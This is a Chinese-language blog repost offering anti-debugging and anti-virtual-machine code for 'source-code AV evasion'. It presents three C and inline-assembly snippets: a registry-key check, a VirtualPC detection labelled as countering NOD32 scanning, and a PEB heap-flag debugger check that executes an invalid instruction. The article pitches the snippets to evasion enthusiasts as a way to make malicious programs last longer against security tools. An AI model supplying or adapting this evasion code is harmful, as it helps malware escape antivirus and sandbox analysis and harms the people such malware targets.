源码免杀--反调试代码,免杀爱好者必备的利剑
源碼免殺只處理特征碼還是不夠的,必須要加入反調試代碼,這樣才能更持久更耐用。這里就發幾個暗夜經常用的反調試代碼給大家。
?
1.
HKEY ck;
char strreg[] = {'S','O','F','T','W','A','R','E','\\','O','D','B','C','\0'};
if(ERROR_SUCCESS!=RegOpenKeyEx(HKEY_LOCAL_MACHINE,(LPCTSTR)strreg,0,KEY_ALL_ACCESS,&ck))?
{
??return 0;
}
===================================================
2.
bool IsVirtualPC()//反nod32查殺
{
__try
{
??__asm
??{
???mov eax, 1
????_emit 0x0F
????_emit 0x3F
????_emit 0x07
????_emit 0x0B
????_emit 0xC7
????_emit 0x45
????_emit 0xFC
????_emit 0xFF
????_emit 0xFF
????_emit 0xFF
????_emit 0xFF
??}
}
__except(1)
{
??return FALSE;
}
return TRUE;
}
===========================================================
3.
if(IsVirtualPC())
{
??return 0;
}
_asm push esi;
_asm mov esi,46;
_asm inc esi;
_asm mov eax,dword ptr fs:[esi+1];
_asm mov eax,dword ptr ds:[eax+24];
_asm mov eax,dword ptr ds:[eax+12];
_asm cmp eax,2;
_asm pop esi;
_asm je Begin;
_asm lock dec ebx;
Begin:
總結
以上是生活随笔為你收集整理的源码免杀--反调试代码,免杀爱好者必备的利剑的全部內容,希望文章能夠幫你解決所遇到的問題。
